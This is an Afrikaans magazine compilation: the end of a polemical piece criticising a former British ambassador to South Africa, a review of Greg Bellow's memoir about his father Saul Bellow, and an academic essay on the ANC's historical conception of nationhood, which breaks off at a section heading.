Die ander kant van die munt: Sou Renwick kritiek uitspreek op die grootskaalse diefstal van blankes se plase in Zimbabwe en sou hy die reeksmoorde op blanke boere in die nuwe Suid-Afrika veroordeel? Om so iets van hierdie eenogige Brit te verwag, sou myns insiens heeltemal te veel wees.

Ek dink Suid-Afrika sou beter daaraan toe gewees het as Renwick nooit toegelaat is om sy voete in Suid-Afrika te sit nie. Hy is egter vereer toe sy termyn as Britse ambassadeur in Suid-Afrika in 1991 verstryk het. “When I left, Wits University, on the proposal of Helen Suzman, was kind enough to award me an honorary degree ‘for services to the struggle against apartheid’. (The offer from the South African government of the Order of Good Hope I had to decline – on the same grounds Margaret Thatcher had declined the freedom of the city of Johannesburg)” (2585). Volgens Renwick was daar iets “that pleased me the most” tydens sy plaaslike ambassadeurskap: “It was possible to try to act as a genuinely honest broker … I left with an unaccustomed sense of humility” (2594).

Die Britte het die Anglo-Boere-oorlog deur verswelging gewen. Sedert 1994 gaan Afrikaners gebuk onder ‘n soortgelyke verskynsel. Renwick se gedrag in Suid-Afrika herinner aan dít wat die Romeine van die Britte gedink het: “Neither brave in battle, nor faithful in peace” (Nicholas Ostler, Empires of the word: A language history of the world, London: HarperCollins, 2005/2010, 640p; Amazon Kindle $6.83, 5127).

Resensie: Intieme beeld van Saul Bellow deur sy seun Greg

Johannes Comestor

Saul Bellow (1915-2005) het in 1976 die Nobel-prys vir letterkunde ontvang. Oor hom en sy werk is al baie geskryf. Eers onlangs het daar welkome nuwe perspektief gekom toe Bellow se oudste kind sy herinneringe en ‘n ontleding van sy pa se werk gepubliseer het. Ek verwys na Greg Bellow (gebore in 1944) se Saul Bellow’s Heart: A son’s memoir (London: Bloomsbury, 2013, 240p; Amazon Kindle $16.39). Voortaan verwys ek na Saul as Bellow en na sy seun as Greg.

saulbellowsheartBellow het veral vanweë twee romans bekendheid verwerf: Herzog (1964) en Humboldt’s Gift (1975). Soos so dikwels gebeur, bv in die geval van Albert Camus (SêNet 10 Feb), kon Bellow na hierdie uitsonderlike verering nie naasteby weer dieselfde literêre hoogtes bereik nie. “The idealistic ‘young Saul’ became the pessimistic ‘old Saul’ … the optimism and hope I loved and admired in ‘young Saul’ were buried under anger, bitterness, intolerance, and preoccupations with evil and with his death, which lasted for the rest of his life” (Kindle 1693).

Greg het ná sy aftrede al sy pa se boeke herlees en veral probeer om die outeur se gees te verstaan. Op grond van eerstehandse kennis dui Greg aan hoe biografiese besonderhede neerslag in Bellow se fiksie gevind het. Vir Greg was dit geen maklike taak om oor sy pa, van wie hy soms vervreemd was, te skryf nie; ook nie oor sy eie en aangetroude familie, van wie baie nog lewe nie. Sy taak is verder bemoeilik deurdat hy geen toegang tot die Saul Bellow-argiewe kon kry nie. Die skryfwerk aan die boek het vyf moeisame jare in beslag geneem. “My ‘Pop’ deserves as full and as honest a written portrait as I can render” (108). “After rereading his soul-searching novels … I find a man trying to understand his inability to live in harmony with others and with himself” (2646).

Soos die boektitel aandui, gaan dit veral om Bellow se innerlike lewe. Hier volg ‘n voorbeeld van hoe Greg sy pa ontleed. “Along with fortune came fame. Initially refusing to become what he called a ‘ribbon cutter,’ someone who presides over public cultural events, Saul gained a reputation for being publicity shy. But the public eye also appealed. He enjoyed readings, any opportunity to joust with reporters, to respond to critics, and to make known his views on cultural and social issues” (1471). “Saul’s public persona had taken on a mythical quality, drawing people who were interested because he was famous, and feeding his already substantial self-centeredness” (1479).

Greg is ‘n psigoterapeut, in die besonder ‘n “child therapist; Saul commented that I had turned the misery of my childhood into a career” (1303). Sielkundige kennis en insig maak Greg uitnemend geskik vir hierdie projek, want Bellow was bekend daarvoor dat hy veral goed vaar wanneer hy oor die innerlike gewaarwordinge van sy karakters geskryf het: “the centrality of what my father called the ‘inner life'” (660). “The real action occurs inside human beings” (2655). Bellow het hierdie idee van die sielkundige Wilhelm Reich (1897-1957) oorgeneem; Reich se “emphasis on emotion as an unadulterated expression of what is essentially human” (1132).

‘n Oorheersende kenmerk van Bellow se lewe is sy vyf huwelike, naamlik met Anita Goshkin (1937-1956), Alexandra (Sasha) Tschacbasov (1956-1959), Susan Glassman (1961-1964), Alexandra Tulcea (1974-1985) en Janis Freedman (1989-2005). Greg ken al Bellow se eggenotes redelik goed en sy ma, Anita (oorlede in 1985), uiteraard baie goed. “Sasha and I had grown close. Susan was pleasant to me, and Alexandra acted as another grandmother to Juliet,” Greg se dogter (2245). Oor Greg se verhouding met Janis skryf ek hieronder.

Greg toon aan waar en hoe hierdie vroue in Bellow se fiksie aan die orde gestel word, bv as die “protective love of women” wat hy ervaar het (591). “He knew that the softness he sought from women was central to his happiness” (598). “Saul married women who possessed some measure of the hardness that I see as necessary to be able to take care of him” (605). “Perhaps an explanation for Saul’s failed marriages lies in the excessively romanticized notions of love” (1967). “An inability to give and take love freely. I believe that to have been Saul’s greatest personal flaw” (2287).

Dit blyk dat Bellow soms sy romans gebruik/misbruik het om houe teen vorige eggenotes in te kry. “His published works gave him the last word” (2074). Erger, Bellow is nie vry te pleit van die moontlikheid dat hy geskei en getrou het om stof vir sy fiksie te versamel nie, of om in die regte stemming vir skeppende werk te kom nie. Byvoorbeeld, Herzog word beskryf as “a book filled with the misery of his second failed marriage” (2067). Skryfwerk was immers vir Bellow die belangrikste faktor in sy lewe: “Writing was his raison d’être” (97).

“He was, after all, a man who lived for a singular creative purpose” (2673). “Writer is the one-word descriptor on Saul Bellow’s gravestone, a final testament to a life where everything and everyone was subordinated to art” (2646). Bellow “chose a life of singular literary purpose and a lifelong pattern of selfish conduct that he could neither deny nor completely bury” (2190). Bellow se persoonlikheid word uiteraard ook duidelik in sy karakters weerspieël, bv “his narrators usually ignore the advice [of well-meaning friends] and follow their own misguided instincts” (1233).

Bellow het hom soggens afgesonder vir skryfwerk. “I understood that writing is hard work whether the results are poems or novels. I remember seeing Saul, winter and summer, emerge from his study with his shirt soaked through with sweat” (1500). In sy aanvaardingstoespraak vir die Nobel-prys het Bellow met verwysing na Joseph Conrad (1857-1924) gesê “art is an ‘attempt to render the highest justice to the visible universe'” (1666).

Bellow se ouers het uit Litoue via Rusland na Kanada verhuis, waar Bellow in Montreal by geboorte die naam Solomon gekry het, maar Saul genoem is. Sy ouer broers was Abraham, Morrie en Sam. “Vanity was something the men in the Bellow family shared, as they thought themselves handsomer and smarter than everyone else. This perceived superiority was often their self-entitled rationale for bending or breaking rules that displeased them. While Sam tempered his feelings of entitlement, Abraham, Morrie, and Saul ignored social convention and viewed people who held contrary opinions with barely veiled contempt” (404). “The boost to Saul’s vanity” word beskou as een van die motiverings vir Bellow se reeks huwelike (611).

Die Bellows het hulle in 1924 in Chicago gevestig. In 1933 het Bellow begin om aan die University of Chicago te studeer. Anders as sy ouers, wat sterk anti-kommunisties was, het Bellow van jongs af aangetrokke tot linkse politieke idees gevoel, bv “Trotskyite idealism” (728). Dit is ook hoe hy sy eerste vrou en mede-student, Anita Goshkin, wie se voorouers uit die Krim-skiereiland gekom het, ontmoet het. Albei het hulle van formele Joodse religieuse praktyke gedistansieer. As student het Bellow die boeke van Balzac en Tolstoy gelees, “sentence by sentence to see if he could improve on them” (445). “He was tutored only by the great writers” (2130). Bellow het homself beskou as “self-taught as a writer” (693).

Bellow het die graad BA aan Northwestern University in Evanston behaal, met Engels en antropologie as hoofvakke. In 1937 het hy met Anita getrou. Sy literêre deurbraak het gekom “by abandoning a fictional style designed to please academics in favor of a naturally flowing prose style” (773). Greg, “could not appreciate his books as literature” (1052). Maar hy noem tog Bellow se “observational capacities” en sy “magnificent descriptive capacities” (1964). Elders verwys Greg na Bellow se “lofty prose” (2670).

Een van Bellow se kenmerke was sy neiging om kort-kort van woning te verander. In die 15 jaar wat hy met sy eerste vrou saamgewoon het, het hulle agtereenvolgend 22 blyplekke gehad. Greg noem dit ‘n “gypsy life” (530, 1254, 2614). Daar was ook ‘n ander verskynsel: “It did not take long for Saul to develop a taste for sex outside of marriage … Saul … adopted a belief that fidelity was a bourgeois ideology” (577). Greg verwys na “Saul’s chronic philandering” (714). Bellow het homself ‘n “serial monogamist” genoem. (605).

“Our father was always easily angered, prone to argument, acutely sensitive, and palpably vulnerable to criticism” (73). Bellow se pa, Abraham, “hated his softness and vulnerability” (518). “Abraham … formed a critical judgment of his youngest as an overgrown crybaby who had failed to absorb the lesson life taught him: the necessity for emotional toughness” (1046). Greg beskryf sy pa as “in many ways a kid who never grew up” (905). “Saul’s inner life had been affected by all the heartache he poured into the … novels that he produced” (1341). “Despite his lifelong inability to manage the effects of tender human feeling, it was at the core of my father’s being” (1566). “Emphasizing the literary lion overlooks the very human man and masks the essential soft side of Saul” (2676).

Bellow het in 1961 met sy derde vrou getrou. Na ‘n hele aantal tydelike doseerposte in Engels en skryfwerk aan verskeie universiteite is hy in 1962 deur die University of Chicago permanent in die Committee on Social Thought aangestel. Dit is ‘n interdissiplinêre doktorale studieprogram. Daar het Bellow die “intellectual companionship” terdeë geniet, bv van die “crusty Edward Shils” (1910-1995), ‘n bekende sosioloog (1454). Bellow het hom egter teen Shils se suiwer rasionaliteit verset en sy geestelike onafhanklikheid sover moontlik probeer handhaaf.

Greg is Bellow se oudste kind en die enigste wat hy by sy eerste vrou gehad het. By sy tweede vrou was Adam sy enigste kind en Daniel by sy derde vrou. By sy vierde vrou, die enigste nie-Jodin met wie Bellow getrou het, ‘n Romeense wiskundige, het hy geen kinders verwek nie. Toe hy 74 was, het Bellow in 1989 die vyfde keer getrou, met een van sy oud-studente en later sy sekretaresse, wat meer as veertig jaar jonger as hy was. By Janis, toe sy 40 was, het Bellow in 1999, toe hy 84 was en na 10 huweliksjare, ‘n dogter, Naomi Rose (Rosie), gehad. Dit kan ‘n oorstootdrie in beseringstyd genoem word. “Her birth caused a stir inside and outside of the family” (2395).

Bellow was en Greg is maar eienaardig. Albei het soms sielkundige terapie ondergaan; bv Bellow omdat sy huwelike misluk het en Greg omdat hy weens sy pa se mislukkings gevrees het dat hy nooit ‘n suksesvolle huwelik kon hê nie. Toe die hoogs bejaarde Bellow nie die huwelik van Greg se dogter bygewoon het nie, Greg “did not speak with Saul for eighteen months” (2463). Bellow se prokureur, Walter Pozen, het volgens Greg verkeerdelik beweer dat Bellow se verstand tot die einde helder gebly het, moontlik om te voorkom dat die geldigheid van sy testament betwis word. “I eventually considered Walter’s gratious assertion of mental clarity to be a preemptive attempt to mythologize Saul Bellow, the famous author, at the expense of my father, the man” (2565). Blykbaar het Greg tog ‘n goeie huwelikslewe met JoAnn. Hulle het in 1970 getrou en het twee kinders, Juliet en Andrew. Dit is begryplik dat pa en seun nie altyd goed oor die weg gekom het nie. Greg was as jong man reeds vasbeslote om finansieel en emosioneel so onafhanklik moontlik van Bellow te wees.

Greg het deurgaans sosialisme aangehang. In die jare sestig het daar tydens bv die burgerregtebeweging tussen vader en seun verwydering oor politieke sake ingetree. Bellow het meer konserwatief geword. Die vernietiging van die sosiale orde, soos weerspieël in bv die verval van New York City, het hom laat besef dat ongebreidelde vryheid gevaarlik is. Bellow het bewus geword van die “fragile state of the entire human endeavor … Saul worried that the future of civilized society was at risk … Angry objections to inequalities expressed by my generation, by women, and by blacks now in political power posed a threat to the twenty-five hundred years of Western culture Saul had studied and to which he had devoted his life. In the late 1970s and ’80s, Saul began to criticize the growing tide of political correctness in society and began to take conservative positions on matters of race and gender” (1761). “Saul took an increasingly negative view of the militancy among blacks in Chicago … Saul became increasingly cautious and troubled by the urban decay that was destroying the Chicago he fondly remembered” (1782).

“Saul had little sympathy with feminist ideas, the increasing presence of women in academia, or prominent women writers” (1816). Aan Candace Falk het Bellow gesê: “‘The only thing you women’s liberationists will have to show for your movement in ten years will be sagging breasts!’ Candace left the class insulted and cestfallen” (1824). “Dissatisfied with the intellectual quality of the work by women and black applicants, he fought against their grants. And Saul offended everyone when he publicly asked: ‘Who was the Tolstoy of the Zulus?'” (1802).

“My father was now siding with the thinkers he had once challenged, promulgating a set of answers and solutions to problems, both social and personal, that I found distinctly patriarchal, authoritarian, and hierarchical” (1858). “More than anything else, I attribute the changes to disillusionment and disappointment – disillusionment that the Marxist ideas in which he had placed so much faith had become a rationale for murderous totalitarian dictatorships, and disappointment in the failure of art to transform the world into a less materialistic place” (1697).

Bellow het in sy latere lewe sy Joodse wortels herontdek, veral na aanleiding van die Arabier-Israeli-oorlog in 1967. Hy het gevrees dat ‘n tweede Holocaust kon plaasvind. Maar steeds “my father found little solace in organized religion” (1716). Hy het vaagweg gehoop dat sy siel dalk onsterflik kon wees. “The once rebellious and irreligious son now found favor in the wisdom of the older generation and in the Jewish roots from which he had distanced himself during my formative years” (1796).

Teen die einde van sy lewe “Saul saw the Marxist beliefs that had fueled his philandering, bohemianism, and permissive parenting as shameful errors” (2053). Daar was by hom ook “revised versions of family life that omitted his painful relationship with his father.” Bellow “came to speak about Grandpa with a fondness that surprised me” (2057). “No aspect of Saul’s past conduct became more shameful to him than having distanced himself from his Jewish roots for over thirty years out of Marxist conviction, as a part of his literary apprenticeship he considered necessary, and because religious observance so little moved him” (2089).

Nadat hy die vyfde keer getrou het, was Bellow se jong bruid Janis aanvanklik die toonbeeld van onderdanige sorgsaamheid. Na mate Bellow al hoe ouer en weerloser geword het, het Janis haar posisie toenemend versterk om haar sin te kry. “Soon Saul was represented by a new literary agent, a new lawyer, and new financial advisers. In the end Janis was installed as Saul’s literary executor, a new will was drafted … and the inheritance Adam, Dan, and I were told to expect was, at a minimum, halved. We were excluded from any posthumous financial benefit from Saul’s literary estate” (2374).

Greg opper besware oor wat oor hom in James Atlas se Saul Bellow-biografie (2000) geskryf is. Janis het gesorg dat Bellow se gemagtigde biograaf, Zachary Leader, toegang tot die Saul Bellow-argiewe kry, maar nie Greg nie. Greg moes toe vir sy boek noodgedwonge grootliks op sy geheue staatmaak. Maar Greg het aan ons ‘n intieme beeld van sy pa gegee wat geen biograaf hom kan nadoen nie.

Die ANC en die konsep van Nasie

Afred Bosch, Centre d’estudis africans, Universiteit van Barcelona

“The people, the real people, do not support Inkatha.  They are with the ANC.”

(Teni, Soweto-aktivis 1993)

Die African National Congress (ANC) beskou en definieer sigself as die grootste nasionale bevrydingsbeweging in Suid Afrika.  Hierdie strewe word reeds in sy naam verwoord.  Wat die leerstellinge betref, stel die belangrikste segsmense hulself voor as instrumenteel in die onherroeplike verandering oor rasse-, kulturele, linguïstiese, etniese, geslags-, ens. grense heen.  Só wil hulle die samelewing wat hulle graag sou wou verteenwoordig, sien.  Enige bespreking rondom die ANC se politieke oriëntasie, veral in die binnekringe van die organisasie, blyk egter ‘n futiele oefening te wees, byna lasterlik

Dit is juis hierdie selfversekerdheid omtrent die nasionale of nasionalistiese siening wat redelike kommer wek:  want wat het nasie in die verlede beteken en wat beteken dit vandag?  Watter staatsvorm word daardeur geïmpliseer?  Hoe is dit veronderstel om in te pas by die labirint van Suid-afrikaanse identiteite?   En verder nog:  is die idee van nasie wat vandag, so geïdealiseer en begeer,  deur die ANC voorgestaan word, gegrond op ‘n werklikheid of is dit slegs ‘n soeke gegrond op ‘n abstraksie?  Was dit van meet af aan reeds daar, gereed om enige oomblik ontdek te word, of is dit gebore uit spesifieke politieke oogmerke, vol illusies en waan?

Die stigterslede van die beweging het nie dieselfde kernbetekenis geheg aan die idee van ‘n Suid-Afrikaanse nasie as wat hul opvolgers gedurende die tweede helfte van die eeu daaraan heg nie.  Vir hulle beteken nasie vandag swart nasie; die res word ten beste as buurnasie beskou (G. Mbeki, 1992, p.26). Die nuwe ontluikende politieke mag is, in 1912, entoesiasties die South African National Native Congress (SANNC) genoem.  Eers in 1923 word die naam verander na ANC.  Sy eweneens entoesiastiese sameroepers het toe die beweging gesien as ‘n groepering van uitgelese Afrikane, strydendes om die toelating van die swart gemeenskap tot burgerregte.  Dit het dus eerder daaroor gegaan om waarborge t.o.v. beskerming van die staat te verkry, asook toelating daartoe, as om die skepping van ‘n nie-rassige, kultureel-oop, ens., samelewing.  Die aanvanklike eise van die SANNC moet gesien word in die lig van wat vandag eweseer geldig is:  Suid Afrika behoort in alle eerlikheid aan Afrikane wat dit heelhartig en op ‘n gelyke voet met ander groepe wil deel.  Die SANNC se eertydse idee van ‘n verbond tussen nasies en die huidige standpunt van die ANC, verskil egter hemelsbreed.  Op dieselfde wyse as wat Dube, Seme of Plaatje in 1912 uit die staanspoor ‘n interstam- (en nie anti-stam- nie) filosofie aangehang het, het die SANNC se idee van nasie nie voorgegee, of geweet hoe, om ‘n suksesvolle teenvoeter te wees vir die ondier van rassisme nie.

Vanweë dié feit was die politieke debat in Suid Afrika sedertdien nog ononderbroke en skaamteloos opgesaal met ras en nasie.  Hier en daar poog outeurs om onderskeide te tref (Maré, 1992, p.50), maar ná soveel jare se segregasie, blyk dit ‘n amper onmoontlike taak te wees (sien, die uiters deurmekaar, Grobler, 1993).  Die ANC het dié vraagstuk, teoreties gesproke, tot en met 1955 (Charter of Liberty), en in die praktyk tot 1985 (J. Frederikse, 1990, p. 242) vermy.  Die nasionalisme van die ANC se pioniers, terwyl dit aanvanklik ooglopend nie-diskriminerend was,  het onvermydelik ook eksklusiwiteit behels.  Selfs met hul visier op ‘n nie-rassige staat ingestel, loop die bekende ou spook van rassisme vandag nog by die debat oor ‘n nuwe territoriale model

Vanselfsprekend is só ‘n debat onvermydelik en selfs natuurlik.  Maar dit behoort ‘n mens dan nie te verhoed om dié twee konsepte uiteindelik van mekaar te skei nie (‘nasie’ en ‘ras’) of om ten minste bedag daarop te wees wanneer hulle met mekaar verwar word en waarom dit gebeur.  Dis nou maar eenmaal so dat die twee woorde afsonderlike betekenisse dra wat nie sondermeer vir mekaar kan instaan nie, nie eers in Suid Afrika nie. Ras het betrekking op fisieke verskille, terwyl nasie weer op kulturele verskille dui en dit bring mee dat die twee soms oorvleuel.  Binne die perke van hierdie stuk wil ons indringend kyk na die ANC se aanvaarde nasionalistiese ideologie, in die besonder beskou waar verskillende konsepsies aangaande ras (‘Racialism’  o.a. as swart bewussynsterm wat daarop neerkom dat négritude meerderwaardig is)  deel uitmaak van die heersende diskoers.

Die Groot Alliansie van Stamme

Moshoeshoe I, koning van Lesotho, het op sy dag gedroom van ‘n groot koalisie van Afrika-nasies wat die blanke koloniseerder van koers af sou kon bring, of ten minste sou kon stuit in sy uitbreiding in Suidelike Afrika.  Hy kon nooit aan sy onderneming gestalte gee nie, maar ten spyte daarvan het hy tog die stigting van ‘n klein protektoraat beleef wat ‘n eeu later, geëmansipeer, as die Koningryk van Lesotho bekend  sou staan.

Die Groot Alliansie egter, sou eers ‘n paar dekades later die lig sien, soos beliggaam deur die SANNC.  Die inisieerders van dié nuwe projek was nie gekroondes òf Afrika-aristokrate nie, maar wel advokate, dokters, onderwysers, kerklikes en verstedelikte intellektuele.  Selfs as goed gedefinieerde groep, was hulle ontvanklik vir tradisionele hiërargie en het hulle daarin geslaag om heelwat volgelinge onder dieselfde vaandel te vereenig.  Pixley I ka Seme, ‘n Zoeloe-advokaat, se uitspraak benadruk hul oproep om saam te staan:

“Die duiwel van rassisme, die afskuwelike twis tussen Xhosas en Fingoes, die heersende onmin tussen  Zoeloes en Tsongas, tussen Sothos en ander inheemse volke, moet begrawe en vergeet word…  Ons is een volk.  Die onderlinge verdelings en jaloesieë is die oorsaak van al ons hartseer en ons agterstand” (R. Rive, 1991, p.10).

‘n Gevoel van doelloosheid en onmag teenoor die wit aggressor het die opkomende swart middelklas reeds sedert die einde van die negentiende eeu daartoe genoop om interstam-organisasies te skep.  Dit was die doelwit van provinsiale kongresse, die Vereeniging van Kaapse Kiesers of  Imbumba Yama Afrika omdat die gewapende stryd, logies gesproke, misluk het vanweë die versplintering en talle onderlinge konflikte wat swartes verdeel het.

Na afloop van die opstande het die gebrek aan geloofwaardige leiers gelei tot die opkoms vanuit die sendingstasies van ‘n opgevoede Christelike elite, wat nie alleen onderlê was in universalisme en materiële vooruitgang nie, maar ook beskik het oor ‘n model vir ‘n interetniese maatskappy.  Gevolglik kon hulle staatmaak op die samewerking van Afrikane ten spyte van die wrewel waarna Seme verwys (UNESCO, 1987, p.245).  Amptelike geskiedskrywers was bewus hiervan en hierdie interetniese alliansie is as dié groot sukses van die SANNC uitgebeeld.  Albert Luthuli, wat in sy outobiografie (A. Luthuli, 1989, p. 1-82) die leiers vir hul beskroomdheid en onderdanigheid kritiseer, loof egter hul sin vir eenheid en die selfopoffering wat daatoe lei dat stedelike en stambelange saamsmelt.  Komende van Luthuli, president van die beweging en self prinslike afstammeling, dra hierdie lofbetuiging besondere betekenis.

Die amptelike ANC-geskiedskrywers voer egter die mitifisering van die ontstaan van die organisasie tot algehele buitensporigheid.  Francis Meli, byvoorbeeld, stel dié geskiedkundige oomblik voor as kulminasie van ‘n nuwe betrokkenheid – nie stamgebonde nie – wat fundamenteel anti-koloniaal en daarom anti-sendeling sou wees.  Hy voeg by:

“Daar word gesê dat hierdie konferensie (van 1912) nie alleen die geboorte was van die ANC nie 

maar ook van ‘n nasie – die ANC het as’t ware as vroedvrou by die proses van renaissance en nasionale  regenerasie ingestaan…  Dit was ‘n nasionale reddingsdaad, ‘n voortsetting – binne ‘n nuwe historiese raamwerk – van die stryd van ons volk teen kolonialisme, wat reeds lank vóór kolonialisme self begin het” (F. Meli, 1988, p.40).

Solomon T. Plaatje, een van die eerste algemene sekretarisse van die SANNC, daarenteen, werp ‘n ander, minder essensialistiese blik daarop en plaas die klem op die vermoë van die organisasie om oorleg tussen uiteenlopende belange te bewerkstellig.  In sy belangrikste werk, Native Life in South Africa, lewer hy ‘n pleidooi teen die Land Act van 1913 (wat slegs 7,3% van die oppervlak van die land beskikbaar stel aan swart mense sover dit besit en boerdery aangaan.), en onderstreep die eenheidsgevoel wat die wet onder swartes teweeggebring het.  Uit ‘n aanhaling in die Engelse pers meen Plaatje dat:  “Suid-afrikaners (wittes) was nog altyd bang vir gesamentlike aksie deur inheemse volke, maar met dié wet het hulle die maklikste manier gekies om alle swart mense te irriteer” (S. Plaatje, 1916, p. 179).

Met die ontstaan van Suid Afrika in 1910 was die idee van ‘n blanke nasie-staat wat swart mense uitsluit en hul burgerskap weier, die resultaat van ‘n samesmelting van Boere-nasionalisme en Britse imperialisme.  Deur Afrikane is dit as heiligskennis beskou.  Die Land Act en ander wetgewende maatreëls sou ook, stadig maar seker, die uiteindelike rigting wat dit ingeslaan het, bevestig.

Die eerste Congress is, met ander woorde, hoofsaaklik gevorm uit reaksie teen ‘n verwronge en arrogante eurosentriese nasie-projek,.  Logies gesproke was die stigting van ‘n afrosentriese klub, of as ‘n mens wil, ‘n rasgebonde een, die enigste verweer.  Ten spyte daarvan sou daar tog ‘n verskil wees:  terwyl ‘n bleek Suid Afrika die bo-toon voer met segregasie, het die gekleurde en ondergeskikte Suid Afrika na vore getree ten gunste van uiteindelike integrasie.  Net soos die Unie van Botha en Smuts dit nie kon vermag om verskille tussen die wit stamme op te hef nie, so ook kon die alliansie tussen Seme en Plaatje nie daarin slaag om die verskille tussen hul eie groepe ter wille van ‘n swart nasie op te los nie.  Om die waarheid te sê, hulle het nie eers voorgegee om te probeer nie.

Die nuanse is belangrik omdat dit die deurslagewende verskille tussen die eertydse Congress en die huidige een verklaar: sy nasionalistiese denke slaan ‘n ander rigting in tydens die vyftigerjare om dan later, tydens sy ballingskap, voltrek te word.  In só ‘n mate dat die SANNC, ten spyte van sy naam, meer nasionalisties as nasionaal raak.  In teenstelling daarmee bly sosiale gedrag, veral onder ‘n meerendeels landelike bevolking, steeds beantwoord aan die kulturele, linguïstiese, mitologiese en territoriale modelle van ‘n Moshoeshoe, Shaka of  Makana.

Binne die SANNC self lyk dit ook nie heeltemal soos anglofone unitarisme nie, selfs al probeer die bourgeois alchemiste, ge-coller en ge-tie, vanaf 1912, die filosofiese klip van ‘n multi-etniese Afrikanisme smee.  Sedert sy begin reeds bestaan die Congress uit twee kamers, ‘n senaat saamgestel uit stamhoofde en ‘n laer kamer.  Selfs al het die laer kamer se afgevaardigdes besluite geneem en die organisasie bestuur, bly die feit dat dit ‘n aristokratiese parlement was ‘n duidelike en noodsaaklike konsessie aan die grotes van Azanië se tradisionalisme.

Die ANC wil vandag – met die uitsondering van ‘n paar aanloklike inisiatiewe ter elfder ure –  nie erken dat só ‘n konsessie ooit bestaan het nie.  Omdat stamhoofde in die verlede met Pretoria geflikflooi en die sluier oor etniese spesifisiteit gelig het, plaas dit die ANC se unitêre patriotisme onder verdenking en beliggaam hulle ‘n verouderde nasionalisme wat oor die algemeen met agterdog bejeën word.  Oor die afgelope tagtig jaar het die samelewing vannselfsprekend ook onomkeerbare veranderinge ondergaan:  die ewolusie van die ANC is ‘n getroue weerspieëling van industrialisering, verstedeliking en, kan ‘n mens maar met ‘n mate van voorbehoud sê, die modernisering van Suid Afrika.  Maar daarby het iets anders ook verander en bes moontlik na aanleiding van ‘n strukturele transformasie.

In teenstelling met wat Francis Meli en ander hedendaagse essensialiste wil beweer, het die primitiewe SANNC sigself nie uitgegee vir ‘n nasionale reddingsdaad nie, nóg minder probeer om lewe te blaas in die idee van ‘n universele lotsbestemming van atavistiese eenheid, wat verlore gegaan het met die aanvang van kolonialisme.  Die groot alliansie het ‘n baie wyer basis gehad as wat vandag bekend staan as die Republiek van Suid Afrika met ‘n mate van verwarring t.o.v. die essensiële kriterium wat elke nasionale doktrine en territoriale identifikasie vereis.  Die eerste grondwet van die SANNC het die insluiting van afgevaardigdes uit die eertydse Rhodesië asook die drie protektorate (die huidige Botswana, Lesotho en Swaziland) in die vooruitsig gestel.  Onder die stigterslede van die SANNC was daar ‘n Sotho (uit wat vandag bekend staan as Lesotho), Maama Seiso en ‘n Tswana (uit Botswana), Joshua Molema; en onder die erepresidente van die eerste kamer was die koning van Lesotho, Letsie II (UNESCO, 1987, p. 724).

Seme, die groot politieke inkwisiteur wat boos na die afskuwelike twis tussen Xhosas en Fingoes, Zoeloes en Tsongas verwys het, was baie gesteld op sy eie afkoms en sy bande met sekere adelslui.  Gedurende sy studieverblyf  in New York was hy eerder as Zoeloe-nasionalis bekend as wat hy ‘n voortstander van ‘n unitêre Suid Afrika was (R. Rive, 1991, p. 87).  Hy het as advokaat die Swazi-monargie verteenwoordig, wat weer op hul beurt die amptelike orgaan van die Congress, Abantu-Botho (UNESCO, 1987, p. 726) gefinansier het.  Die jong Seme het ook ‘n sagte plek vir die Zoeloe-adel gehad en het koning Dinizulu se dogter só goed leer ken – in die Bybelse sin van die woord – dat sy met hom moes trou.  In die jare dertig raak hy uit en uit ‘n tradisionalis en probeer om die Eerste Kamer, wat na minder as twintig jaar reeds verdwyn het, te reabiliteer.

Plaatje, ‘n Tswana, wat swart belange in die Transvaal en Oranje Vrystaat verdedig het, kon ‘n hele paar inheemse tale praat en het daarby ook ‘n belang by kiesers in die Kaap gehad (sy vrou was ‘n Fingoe).  Sy biograaf meen dat dié talent daartoe bygedra het dat hy tot sekretaris-generaal verkies is.  Nie net was hy ‘n groot kenner van die stamstelsel nie, maar ook ‘n kampvegter vir  die Tswana-taal en hy het sterk daarop aangedring dat ‘n aristokratiese gesag geskep word met agt hoofde as ere-ampsdraers van die SANNC.  Laasgenoemde  versoek is hom gegun, hoewel ‘n inheemse naam vir die beweging afgewys is (B. Willan, p. 153-155).

Die voorafgaande feite weerspreek hoegenaamd nie die fundamentele premisse van die Congress se stigterslede nie:  die skepping van ‘n nuwe, intervolk-, Afrikanasie aan die suidpunt van die swart kontinent.  Twee onderskeidende kenmerke moet egter in aanmerking geneem word.

-Eerstens is die werklikheid van multi-etnisiteit nie oor die hoof gesien nie.  In só ‘n mate dat, ten spyte daarvan dat die kern van leiers uit ‘n klein professionele kosmopolitiese klas gekom het, die basis berus het op ou stamstrukture.  Dit was tradisioneel en landelik en deur vele nog beskou as die ware volke van Afrika.

-Tweedens was die houding van die Congress se patriargie van só ‘n aard dat ‘n mens nie sou kon sê die groot alliansie is voorgehou as die ontwaking van ‘n slapende volk, wat dadelik in staat was om alle stamverskille te kon oorbrug nie, maar as die skepping van ‘n nuwe moontlikheid.  Hul visie, soos weerspiëel in die nuwe program, was eerder een van samewerking as van essensialisme:  dit  het ‘n historiese breuk t.o.v. die verbrokkelende anti-koloniale stryd bewerkstellig.  Overgezet synde, was die aard van die aanbevole politieke en territoriale entiteit nie duidelik nie en sou dit ewolueer na gelang van veranderende omstandighede in die stand van dag-tot-dag politieke bestuur.  Die idee van die insluiting van Rhodesië en die protektorate sou laat vaar word; konsolidasie van die Unie – en later die Republiek van Suid Afrika – se grense sou dit laat sneuwel.  Die erkenning van etniese groeperings – òf dan verdraagsaamheid daarteenoor – sou verflou as gevolg van Pretoria se slagspreuk:  “verdeel en heers”.  Veral ná die Nasionale Party en D.F. Malan se oorwinning.

Moshoeshoe se droom is bewaarheid, ten minste die pasifistiese en konstitusionele deel daarvan.  ‘n Nuwe Afrikapatriotisme, pluraal en interetnies, het ontstaan wat ewe interprovinsialisties was as die blanke Unie, d.w.s. gegrond op vier administratiewe gebiede – twee voormalige Britse kolonies en twee voormalige Boererepublieke – wat grotendeels outonoom was ná die stigtingsooreenkoms in 1910.  Nog baie water moes egter in die see vloei om by die huidige ANC se idee van ‘n gesentraliseerde nasie-staat waar gelykheid, nie-rassigheid, nie-seksisme en nie-stamgebondenheid heers, uit te kom.  Die Jakobynse beskouing van ‘n onafhanklike en soewereine land, bestaande uit burgers en nie groepe nie, sou eers ‘n paar dekades lank moes wag.

Nasie van Nasies?

